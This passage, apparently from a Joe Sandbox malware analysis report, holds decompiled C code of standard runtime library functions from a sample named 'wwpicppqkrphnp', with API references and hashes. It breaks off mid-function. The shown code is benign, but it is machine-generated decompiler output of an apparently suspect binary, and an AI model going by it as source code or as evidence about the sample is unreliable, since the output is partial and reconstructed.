						_t51 = E00406E9A(_t88, 1, _a16, _t93, _t72, _t86);
						_t100 = _t98 + 0x18;
						if(_t51 == 0) {
							goto L37;
						}
						_t90 = _v12;
						_t53 = E0040491F(_a8, _a12, _t72, _v12, 0, 0, 0, 0, 0); // executed
						_t95 = _t53;
						if(_t95 == 0) {
							goto L37;
						}
						_t86 = 0x400;
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t95 + _t95 + 8; // 0x8
							asm("sbb eax, eax");
							_t55 = _t95 + _t95 & _t31;
							if(_t55 == 0) {
								_t91 = 0;
								L31:
								if(_t91 == 0 || E0040491F(_a8, _a12, _t72, _v12, _t91, _t95, 0, 0, 0) == 0) {
									L36:
									E00406D77(_t91);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t95);
									_push(_t91);
									_push(0);
									_push(_a32);
									_t95 = E00407C7F();
									if(_t95 != 0) {
										E00406D77(_t91);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t55 > 0x400) {
								_t91 = E004069B7(_t55);
								if(_t91 == 0) {
									goto L36;
								}
								 *_t91 = 0xdddd;
								L29:
								_t91 = _t91 + 8;
								goto L31;
							}
							E0040B130(_t55);
							_t91 = _t100;
							if(_t91 == 0) {
								goto L36;
							}
							 *_t91 = 0xcccc;
							goto L29;
						}
						_t63 = _a28;
						if(_t63 == 0) {
							goto L38;
						}
						if(_t95 > _t63) {
							goto L37;
						}
						_t95 = E0040491F(_a8, _a12, _t72, _t90, _a24, _t63, 0, 0, 0);
						if(_t95 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t72 = E004069B7(_t49);
						if(_t72 == 0) {
							L13:
							_t86 = _v12;
							goto L15;
						}
						 *_t72 = 0xdddd;
						L12:
						_t72 = _t72 + 8;
						goto L13;
					}
					E0040B130(_t49);
					_t72 = _t98;
					if(_t72 == 0) {
						goto L13;
					}
					 *_t72 = 0xcccc;
					goto L12;
				}
			}

APIs

__freea.LIBCMT ref: 0040A3DE

Part of subcall function 004069B7: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,0040B9FC,?,00000000,?,00407C5B,?,00000004,00000000,?,?,?,00402C6D), ref: 004069E9

__freea.LIBCMT ref: 0040A3E7
__freea.LIBCMT ref: 0040A40A

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: __freea$AllocateHeap
String ID:
API String ID: 2243444508-0
Opcode ID: 98ed8fb06fbf07bbe753fe517fd8d48446171f5b9103d11e8c1d95a03c05329b
Instruction ID: 77cd93b2ce3072163f2ea3b1e109bb15a50019cebf6d2acaf028941ef4fd17c0
Opcode Fuzzy Hash: 98ed8fb06fbf07bbe753fe517fd8d48446171f5b9103d11e8c1d95a03c05329b
Instruction Fuzzy Hash: A151D472600306ABDB209F65CC81EAB36A9EF84754F15413FFD05B72C0E779DC2196AA

Uniqueness

Uniqueness Score: -1.00%

Function 00409D26 Relevance: 4.5, APIs: 3, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00409D26(void* __ecx, void* __eflags, signed int _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr _a16) {
				signed int _v8;
				void* _v12;
				void* _t15;
				int _t16;
				signed int _t19;
				intOrPtr _t28;
				signed int _t32;
				signed int _t33;
				signed int _t36;
				signed int _t39;

				_t36 = _a4;
				_push(_t32);
				_t15 = E00408141(_t36);
				_t33 = _t32 | 0xffffffff;
				_t41 = _t15 - _t33;
				if(_t15 != _t33) {
					_push(_a16);
					_t16 = SetFilePointerEx(_t15, _a8, _a12,  &_v12); // executed
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = (_v12 & _v8) - _t33;
						if((_v12 & _v8) == _t33) {
							goto L2;
						} else {
							_t19 = _v12;
							_t39 = (_t36 & 0x0000003f) * 0x38;
							_t28 =  *((intOrPtr*)(0x417158 + (_t36 >> 6) * 4));
							_t11 = _t28 + _t39 + 0x28;
							 *_t11 =  *(_t28 + _t39 + 0x28) & 0x000000fd;
							__eflags =  *_t11;
						}
					} else {
						E0040661C(GetLastError());
						goto L2;
					}
				} else {
					 *((intOrPtr*)(E004065F6(_t41))) = 9;
					L2:
					_t19 = _t33;
				}
				return _t19;
			}

APIs

SetFilePointerEx.KERNELBASE(00000000,?,00000002,?,00000000), ref: 00409D5F
GetLastError.KERNEL32(?,00409C15,?,?,00000002,00000000,?,0040A715,00000001,00000000,00000000,00000002,?,?,?,00406488), ref: 00409D69
__dosmaperr.LIBCMT ref: 00409D70

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 6f166a4ca9b15468caa8685c1b769f618a0582618230dc9a1c67b59fe4a86ca6
Instruction ID: 44da02c1f9cc79079b9295c2c5443da2eefbb780e6402fb1b3523568508803b7
Opcode Fuzzy Hash: 6f166a4ca9b15468caa8685c1b769f618a0582618230dc9a1c67b59fe4a86ca6
Instruction Fuzzy Hash: 23014C327005147BCB059F99DC45CAE3B29DFC1320729022AF812BB2D1EA34DD419754

Uniqueness

Uniqueness Score: -1.00%

Function 00407D2C Relevance: 4.5, APIs: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00407D2C() {
				void* _t3;
				void* _t16;
				WCHAR* _t17;

				_t17 = GetEnvironmentStringsW();
				if(_t17 != 0) {
					_t11 = E00407D7C(_t17) - _t17 & 0xfffffffe;
					_t3 = E004069B7(E00407D7C(_t17) - _t17 & 0xfffffffe); // executed
					_t16 = _t3;
					if(_t16 != 0) {
						E00409670(_t16, _t17, _t11);
					}
					E00405BB5(0);
					FreeEnvironmentStringsW(_t17);
				} else {
					_t16 = 0;
				}
				return _t16;
			}

0x00407d36
0x00407d3a
0x00407d4b
0x00407d4f
0x00407d54
0x00407d5a
0x00407d5f
0x00407d64
0x00407d69
0x00407d70
0x00407d3c
0x00407d3c
0x00407d3c
0x00407d7b

APIs

GetEnvironmentStringsW.KERNEL32(00000000,00260A88,00402F05,00000000,00260A88,00402FE4,00407E36,00000000,00000000,00000000,?,00403160,00000000,00000000), ref: 00407D30
_free.LIBCMT ref: 00407D69
FreeEnvironmentStringsW.KERNEL32(00000000,00000000,?,00403160,00000000,00000000,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00407D70

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: EnvironmentStrings$Free_free
String ID:
API String ID: 2716640707-0
Opcode ID: e8e4aa606fca1511f428dae779e9d055dab3f6ff5b9c17f9b1d491d70a1a3b64
Instruction ID: fb2cf39da888a10db5f46b23b65b40f5778fca8442aa9d19c350dd2f880b8073
Opcode Fuzzy Hash: e8e4aa606fca1511f428dae779e9d055dab3f6ff5b9c17f9b1d491d70a1a3b64
Instruction Fuzzy Hash: C1E02B77608A1027D222223A7C89DBB162DCFC5378B25013BF425763C2FE785C0240BE

Uniqueness

Uniqueness Score: -1.00%

Function 004048D4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E004048D4(void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				int _t7;
				intOrPtr* _t11;

				_t11 = E00404AB4(0x12, "InitializeCriticalSectionEx", 0x40f600, 0x40f608);
				if(_t11 == 0) {
					_t7 = InitializeCriticalSectionAndSpinCount(_a4, _a8); // executed
					return _t7;
				}
				 *0x418000(_a4, _a8, _a12);
				return  *_t11();
			}

0x004048f0
0x004048f7
0x00404914
0x00000000
0x00404914
0x00404904
0x00000000

APIs

InitializeCriticalSectionAndSpinCount.KERNELBASE(?,?), ref: 00404914

Strings

InitializeCriticalSectionEx, xrefs: 004048E4

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: ee9e81118929fe9f91603bc4a054c557b6e1e9d628955804a25df52520f7c22d
Instruction ID: 8a833d066a978b0f130d7e2ca597e35b32d2164a9864159e328ad9a028cbbcbf
Opcode Fuzzy Hash: ee9e81118929fe9f91603bc4a054c557b6e1e9d628955804a25df52520f7c22d
Instruction Fuzzy Hash: CFE0927128121CBBCF211F51CC05EDF7F25EB94760B208036FE18251B1C67A8921AACC

Uniqueness

Uniqueness Score: -1.00%

Function 004047D5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E004047D5(void* __eflags, intOrPtr _a4) {
				intOrPtr* _t2;
				intOrPtr* _t7;

				_t2 = E00404AB4(3, "FlsAlloc", 0x40f5e0, 0x40f5e8); // executed
				_t7 = _t2;
				if(_t7 == 0) {
					return TlsAlloc();
				}
				 *0x418000(_a4);
				return  *_t7();
			}

0x004047ec
0x004047f1
0x004047f8
0x00000000
0x00404809
0x004047ff
0x00000000

APIs

TlsAlloc.KERNEL32 ref: 00404809

Strings

FlsAlloc, xrefs: 004047E5

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 0528a5645a93e07f6ff5f16f19ddf89c9b12ec8d641c766216609d0e1e168e65
Instruction ID: a5514183a778f22fdfc75292032c2024479d6a2b8f9441e5aa68e4f99bdff5fa
Opcode Fuzzy Hash: 0528a5645a93e07f6ff5f16f19ddf89c9b12ec8d641c766216609d0e1e168e65
Instruction Fuzzy Hash: 0AE0C27A68026477C2223B91AC06BDA7D049B84BA1B158033FB09322D3DAB8091185ED

Uniqueness

Uniqueness Score: -1.00%

Function 004054A4 Relevance: 3.2, APIs: 2, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E004054A4(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t51;
				signed int _t55;
				int _t57;
				signed int _t60;
				signed int _t61;
				short _t64;
				signed char _t66;
				signed int _t67;
				signed char* _t75;
				signed char* _t76;
				int _t78;
				signed int _t83;
				signed char* _t84;
				short* _t85;
				signed int _t86;
				signed char _t87;
				signed int _t88;
				void* _t89;
				signed int _t90;
				signed int _t91;
				short _t92;
				signed int _t93;
				intOrPtr _t95;
				signed int _t96;

				_t89 = __edx;
				_t51 =  *0x416010; // 0x34f38f42
				_v8 = _t51 ^ _t96;
				_t95 = _a8;
				_t78 = E00405697(__eflags, _a4);
				if(_t78 == 0) {
					L36:
					E00405708(_t95);
					goto L37;
				} else {
					_t92 = 0;
					_t83 = 0;
					_t57 = 0;
					_v32 = 0;
					while( *((intOrPtr*)(_t57 + 0x4164a0)) != _t78) {
						_t83 = _t83 + 1;
						_t57 = _t57 + 0x30;
						_v32 = _t83;
						if(_t57 < 0xf0) {
							continue;
						} else {
							if(_t78 == 0xfde8) {
								L22:
								_t55 = _t57 | 0xffffffff;
							} else {
								_t57 = IsValidCodePage(_t78 & 0x0000ffff);
								if(_t57 == 0) {
									goto L22;
								} else {
									if(_t78 != 0xfde9) {
										_t57 = GetCPInfo(_t78,  &_v28);
										__eflags = _t57;
										if(_t57 == 0) {
											__eflags =  *0x417368 - _t92; // 0x0
											if(__eflags != 0) {
												goto L36;
											} else {
												goto L22;
											}
										} else {
											_t14 = _t95 + 0x18; // 0x40a953
											E00402060(_t92, _t14, _t92, 0x101);
											 *(_t95 + 4) = _t78;
											__eflags = _v28 - 2;
											 *((intOrPtr*)(_t95 + 0x21c)) = _t92;
											if(_v28 == 2) {
												__eflags = _v22;
												_t75 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t87 = _t75[1];
														__eflags = _t87;
														if(_t87 == 0) {
															goto L18;
														}
														_t90 = _t87 & 0x000000ff;
														_t88 =  *_t75 & 0x000000ff;
														while(1) {
															__eflags = _t88 - _t90;
															if(_t88 > _t90) {
																break;
															}
															 *(_t95 + _t88 + 0x19) =  *(_t95 + _t88 + 0x19) | 0x00000004;
															_t88 = _t88 + 1;
															__eflags = _t88;
														}
														_t75 =  &(_t75[2]);
														__eflags =  *_t75;
														if( *_t75 != 0) {
															continue;
														}
														goto L18;
													}
												}
												L18:
												_t25 = _t95 + 0x1a; // 0x40a955
												_t76 = _t25;
												_t86 = 0xfe;
												do {
													 *_t76 =  *_t76 | 0x00000008;
													_t76 =  &(_t76[1]);
													_t86 = _t86 - 1;
													__eflags = _t86;
												} while (_t86 != 0);
												_t26 = _t95 + 4; // 0xc033a47d
												 *((intOrPtr*)(_t95 + 0x21c)) = E004059A9( *_t26);
												_t92 = 1;
											}
											goto L8;
										}
									} else {
										 *(_t95 + 4) = 0xfde9;
										 *((intOrPtr*)(_t95 + 0x21c)) = _t92;
										 *((intOrPtr*)(_t95 + 0x18)) = _t92;
										 *((short*)(_t95 + 0x1c)) = _t92;
										L8:
										 *((intOrPtr*)(_t95 + 8)) = _t92;
										_t12 = _t95 + 0xc; // 0x40a947
										_t92 = _t12;
										asm("stosd");
										asm("stosd");
										asm("stosd");
										L9:
										E004059E7(_t90, _t95); // executed
										L37:
										_t55 = 0;
									}
								}
							}
						}
						goto L38;
					}
					_t28 = _t95 + 0x18; // 0x40a953
					E00402060(_t92, _t28, _t92, 0x101);
					_t60 = _v32 * 0x30;
					__eflags = _t60;
					_v36 = _t60;
					_t61 = _t60 + 0x4164b0;
					_v32 = _t61;
					do {
						__eflags =  *_t61;
						_t84 = _t61;
						if( *_t61 != 0) {
							while(1) {
								_t66 = _t84[1];
								__eflags = _t66;
								if(_t66 == 0) {
									break;
								}
								_t91 =  *_t84 & 0x000000ff;
								_t67 = _t66 & 0x000000ff;
								while(1) {
									__eflags = _t91 - _t67;
									if(_t91 > _t67) {
										break;
									}
									__eflags = _t91 - 0x100;
									if(_t91 < 0x100) {
										_t34 = _t92 + 0x416498; // 0x8040201
										 *(_t95 + _t91 + 0x19) =  *(_t95 + _t91 + 0x19) |  *_t34;
										_t91 = _t91 + 1;
										__eflags = _t91;
										_t67 = _t84[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t84 =  &(_t84[2]);
								__eflags =  *_t84;
								if( *_t84 != 0) {
									continue;
								}
								break;
							}
							_t61 = _v32;
						}
						_t92 = _t92 + 1;
						_t61 = _t61 + 8;
						_v32 = _t61;
						__eflags = _t92 - 4;
					} while (_t92 < 4);
					 *(_t95 + 4) = _t78;
					 *((intOrPtr*)(_t95 + 8)) = 1;
					 *((intOrPtr*)(_t95 + 0x21c)) = E004059A9(_t78);
					_t46 = _t95 + 0xc; // 0x40a947
					_t85 = _t46;
					_t90 = _v36 + 0x4164a4;
					_t93 = 6;
					do {
						_t64 =  *_t90;
						_t90 = _t90 + 2;
						 *_t85 = _t64;
						_t49 = _t85 + 2; // 0x8babab84
						_t85 = _t49;
						_t93 = _t93 - 1;
						__eflags = _t93;
					} while (_t93 != 0);
					goto L9;
				}
				L38:
				return E00401C35(_t55, _t78, _v8 ^ _t96, _t89, _t92, _t95);
			}

APIs

Part of subcall function 00405697: GetOEMCP.KERNEL32(00000000,00405828,0040A93B,00000000,?,?,00000000,?,0040A93B), ref: 004056C2

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0040586F,?,00000000,0040A93B,558B0000,?,?,?,?,?), ref: 00405502
GetCPInfo.KERNEL32(00000000,0040586F,?,?,0040586F,?,00000000,0040A93B,558B0000,?,?,?,?,?,00000000), ref: 00405544

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 0f21bd47a8b32e3c5a88146ca5cda61a09d08f1df18d1680a2ce81fd349fed21
Instruction ID: a42d7a1bd8c3dce034ae1aabd50fd8a6a95c3542f058937f4eeaa0d27c1a08c2
Opcode Fuzzy Hash: 0f21bd47a8b32e3c5a88146ca5cda61a09d08f1df18d1680a2ce81fd349fed21
Instruction Fuzzy Hash: FF512370A00B45AEDB208F61C8406ABBBF6EF50304F54483FD096A72D1D67D9A42CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040A017 Relevance: 3.1, APIs: 2, Instructions: 67
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0040A017(void* __ecx, signed int _a4, CHAR* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _v8;
				_Unknown_base(*)()** _v12;
				_Unknown_base(*)()** _t23;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__* _t26;
				signed int* _t33;
				signed int _t36;
				struct HINSTANCE__** _t38;
				signed int _t44;
				signed int _t45;
				struct HINSTANCE__* _t49;

				_push(_t44);
				_t23 = 0x4173b8 + _a4 * 4;
				_v12 = _t23;
				_t24 =  *_t23;
				_t45 = _t44 | 0xffffffff;
				if(_t24 != _t45) {
					if(_t24 != 0) {
						L13:
						return _t24;
					}
					_t33 = _a12;
					while(_t33 != _a16) {
						_t36 =  *_t33;
						_v8 = _t36;
						_t49 =  *(0x4173ac + _t36 * 4);
						if(_t49 == 0) {
							_t26 = E00409FCC( *((intOrPtr*)(0x41013c + _t36 * 4))); // executed
							_t49 = _t26;
							_t38 = 0x4173ac + _v8 * 4;
							if(_t49 != 0) {
								 *_t38 = _t49;
								if( *_t38 != 0) {
									FreeLibrary(_t49);
								}
								L16:
								_t24 = GetProcAddress(_t49, _a8);
								if(_t24 == 0) {
									break;
								}
								 *_v12 = _t24;
								L12:
								goto L13;
							}
							 *_t38 = _t45;
							L9:
							_t33 =  &(_t33[1]);
							continue;
						}
						if(_t49 != _t45) {
							goto L16;
						}
						goto L9;
					}
					 *_v12 = _t45;
					_t24 = 0;
					goto L12;
				}
				_t24 = 0;
				goto L13;
			}

APIs

FreeLibrary.KERNEL32(00000000,?,00416F08,?,?,?,00409F9F,00000004,InitializeCriticalSectionEx,00410168,00410170,00000000,?,004043D0,00416F08,00000FA0), ref: 0040A09A
GetProcAddress.KERNEL32(00000000,?,?,00416F08,?,?,?,00409F9F,00000004,InitializeCriticalSectionEx,00410168,00410170,00000000,?,004043D0,00416F08), ref: 0040A0A4

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID:
API String ID: 3013587201-0
Opcode ID: 78eab97d538da3307db90c5152bdd002ef4c9f52a44079731835acbadf9e9fcb
Instruction ID: 9fdaa8e927d6de20b596cf0b135b7a964002c4763f17e634ff29b150ae83185b
Opcode Fuzzy Hash: 78eab97d538da3307db90c5152bdd002ef4c9f52a44079731835acbadf9e9fcb
Instruction Fuzzy Hash: 92119A3260021DAFCB22CF64D88099A73B4BB46360724417AED51EB290E639ED11CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00405312 Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00405312() {
				signed int _t20;
				signed int _t22;
				long _t23;
				signed char _t25;
				void* _t28;
				signed int _t31;
				void* _t33;

				_t31 = 0;
				do {
					_t20 = _t31 & 0x0000003f;
					_t33 = _t20 * 0x38 +  *((intOrPtr*)(0x417158 + (_t31 >> 6) * 4));
					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
						 *(_t33 + 0x28) = 0x81;
						_t22 = _t31;
						if(_t22 == 0) {
							_push(0xfffffff6);
						} else {
							if(_t22 == 1) {
								_push(0xfffffff5);
							} else {
								_push(0xfffffff4);
							}
						}
						_pop(_t23);
						_t28 = GetStdHandle(_t23);
						if(_t28 == 0xffffffff || _t28 == 0) {
							_t25 = 0;
						} else {
							_t25 = GetFileType(_t28); // executed
						}
						if(_t25 == 0) {
							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							 *(_t33 + 0x18) = 0xfffffffe;
							_t20 =  *0x417390; // 0x262fa0
							if(_t20 != 0) {
								_t20 =  *(_t20 + _t31 * 4);
								 *(_t20 + 0x10) = 0xfffffffe;
							}
						} else {
							_t20 = _t25 & 0x000000ff;
							 *(_t33 + 0x18) = _t28;
							if(_t20 != 2) {
								if(_t20 == 3) {
									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
								}
							} else {
								 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							}
						}
					} else {
						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
					}
					_t31 = _t31 + 1;
				} while (_t31 != 3);
				return _t20;
			}

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00405201,00415118,0000000C), ref: 0040535E
GetFileType.KERNELBASE(00000000), ref: 00405370

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 0903183e3e9cf8da30489f04e8bee3f85a189a1ade626cf4d41bf0ba5f4ce8af
Instruction ID: 2a536b4d2e018bea06c5d9b46e4d698b8ddbe8db1171594862c8f5111bbd19d6
Opcode Fuzzy Hash: 0903183e3e9cf8da30489f04e8bee3f85a189a1ade626cf4d41bf0ba5f4ce8af
Instruction Fuzzy Hash: C911DA71504F418AD7304A3D8C98627BA94E7563B0B38073BDDB6E67F1C3B8D8429A4D

Uniqueness

Uniqueness Score: -1.00%

Function 00404295 Relevance: 3.0, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00404295(void* __ecx) {
				intOrPtr _t1;
				void* _t2;
				void* _t7;
				void* _t9;

				_t1 = E00409E96(__ecx, E00404383); // executed
				 *0x416024 = _t1;
				_pop(_t7);
				if(_t1 != 0xffffffff) {
					_t2 = E00409F47(_t7, _t1, 0x416ea4);
					_pop(_t9);
					if(_t2 != 0) {
						return 1;
					} else {
						E004042C8(_t9);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x0040429a
0x0040429f
0x004042a4
0x004042a8
0x004042b3
0x004042b9
0x004042bc
0x004042c7
0x004042be
0x004042be
0x00000000
0x004042be
0x004042aa
0x004042aa
0x004042ac
0x004042ac

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004042B3
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 004042BE

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: b125dddd65666ed71bbebfa495ee445cac2e4d5b4cd2a4ac5d1d26546ec32169
Instruction ID: 7a41f60f7a33acbadd3e78c2f252c11b0a25c7f3afcd7272ed05a330133e31f8
Opcode Fuzzy Hash: b125dddd65666ed71bbebfa495ee445cac2e4d5b4cd2a4ac5d1d26546ec32169
Instruction Fuzzy Hash: 47D0A7A871430259DE0077B1A80258613844ED1BF837143FFFB30F55C2EA3DC841111E

Uniqueness

Uniqueness Score: -1.00%

Function 00403F84 Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00403F84(signed int __edx, intOrPtr* _a4) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* __edi;
				void* __esi;
				signed int _t58;
				signed int _t59;
				signed char _t61;
				signed int _t63;
				signed char _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr _t76;
				void* _t77;
				intOrPtr _t78;
				signed int _t86;
				intOrPtr _t90;
				signed int _t91;
				signed int _t92;
				intOrPtr* _t93;
				signed char _t94;
				signed int _t95;
				signed int _t96;
				signed int _t98;
				signed int _t102;
				signed int _t106;
				signed int _t108;
				signed int _t111;
				intOrPtr* _t112;
				void* _t115;
				void* _t116;

				_t97 = __edx;
				_t119 = _a4;
				if(_a4 != 0) {
					_t58 = E00408AE8(_a4);
					_t90 = _a4;
					_t106 = _t58;
					__eflags =  *(_t90 + 8);
					if( *(_t90 + 8) < 0) {
						 *(_t90 + 8) = 0;
					}
					_t59 = E00409BE4(_t106, 0, 0, 1); // executed
					_t91 = _t97;
					_t116 = _t115 + 0x10;
					_v12 = _t91;
					_t111 = _t59;
					_v24 = _t111;
					__eflags = _t91;
					if(__eflags > 0) {
						L7:
						_t61 =  *(_a4 + 0xc);
						__eflags = _t61 & 0x000000c0;
						if((_t61 & 0x000000c0) != 0) {
							_t63 = _t106 >> 6;
							_t92 = (_t106 & 0x0000003f) * 0x38;
							_v16 = _t63;
							_v20 = _t92;
							_t93 = _a4;
							_v8 =  *((intOrPtr*)(_t92 +  *((intOrPtr*)(0x417158 + _t63 * 4)) + 0x29));
							_t94 =  *(_t93 + 0xc);
							asm("cdq");
							_t108 =  *_t93 -  *((intOrPtr*)(_t93 + 4));
							_t86 = _t97;
							__eflags = _t94 & 0x00000003;
							if((_t94 & 0x00000003) == 0) {
								__eflags =  *(_a4 + 0xc) >> 0x00000002 & 0x00000001;
								if(__eflags != 0) {
									goto L18;
								} else {
